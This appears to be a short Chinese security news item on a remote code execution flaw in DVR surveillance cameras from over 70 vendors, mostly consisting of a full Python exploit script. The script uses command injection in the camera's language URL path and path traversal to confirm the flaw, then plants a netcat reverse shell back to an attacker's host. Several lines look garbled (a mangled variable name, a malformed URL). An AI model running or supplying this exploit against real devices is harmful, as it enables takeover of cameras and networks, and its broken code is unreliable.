根据安全研究员Rotem Kemer研究发现,超过70个供应商售卖的监控摄像头都很容哟受到远程代码执行(RCE)攻击。
它会读取URL,如果URL包含以下的内容/language/[language]/index.html 。
tar –zxf /mnt/mtd/WebSites/language.tar.gz [language]/* -C /nfsdir/language
- #!/usr/bin/python
- # http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html
- __author__ = 'Rotem Kerner'
- from sys import argv
- import optparse
- from urlparse import urlparse
- from re import compile
- import socket
- import requests
- from requests.exceptions import ConnectionError, Timeout, ContentDecodingError
- from socket import timeout
- def main():
- # parse command line options and atguments
- optparseoptparser = optparse.OptionParser(usage="%s <target-url> [options]" % argv[0])
- optparser.add_option('-c','--check',action="store_true",dest="checkvuln", default=False,
- help="Check if target is vulnerable")
- optparser.add_option('-e','--exploit', action="store", type="string", dest="connback",
- help="Fire the exploit against the given target URL")
- (options, args) = optparser.parse_args()
- try:
- target = args[0]
- except IndexError:
- optparser.print_help()
- exit()
- target_url = urlparse(target)
- # validating hostname
- if not target_url.hostname:
- print "[X] supplied target "%s" is not a valid URL" % target
- optparser.print_help()
- exit()
- # A little hack to handle read timeouts, since urllib2 doesnt give us this functionality.
- socket.setdefaulttimeout(10)
- # is -c flag on check if target url is vulnrable.
- if options.checkvuln is True:
- print "[!] Checking if target "%s" is vulnable..." % target_url.netloc
- try:
- # Write file
- raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js'
- % (target_url.scheme, target_url.netloc))
- # Read the file.
- response = raw_url_request('%s:/%s/../../../../../../../mnt/mtd/test' % (target_url.scheme, target_url.netloc))
- # remove it..
- raw_url_request('%s://%s/language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js'
- % (target_url.scheme, target_url.netloc))
- except (ConnectionError, Timeout, timeout) as e:
- print "[X] Unable to connect. reason: %s. exiting..." % e.message
- return
- if response.text[0] != '1':
- print "[X] Expected response content first char to be '1' got %s. exiting..." % response.text
- return
- print "[V] Target "%s" is vulnerable!" % target_url.netloc
- # if -e is on then fire exploit,
- if options.connback is not None:
- # Validate connect-back information.
- pattern = compile('(?P<host>[a-zA-Z0-9.-]+):(?P<port>[0-9]+)')
- match = pattern.search(options.connback)
- if not match:
- print "[X] given connect back "%s" should be in the format for host:port" % options.connback
- optparser.print_help()
- exit()
- # fire remote code execution!
- # Three ..
- try:
- raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a'
- % (target_url.scheme, target_url.netloc, match.group('host'), match.group('port')))
- # Two ...
- raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}"-e${IFS}$SHELL${IFS}">>e&&${IFS}/a'
- % (target_url.scheme, target_url.netloc))
- # One. Left off!
- raw_url_request('%s://%s/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s'
- % (target_url.scheme, target_url.netloc))
- except (ConnectionError, Timeout, timeout) as e:
- print "[X] Unable to connect reason: %s. exiting..." % e.message
- print "[V] Exploit payload sent!, if nothing went wrong we should be getting a reversed remote shell at %s:%s"
- % (match.group('host'), match.group('port'))
- # Disabling URL encode hack
- def raw_url_request(url):
- r = requests.Request('GET')
- r.url = url
- rr = r.prepare()
- # set url without encoding
- r.url = url
- s = requests.Session()
- return s.send(r)
- if __name__ == '__main__':
- main()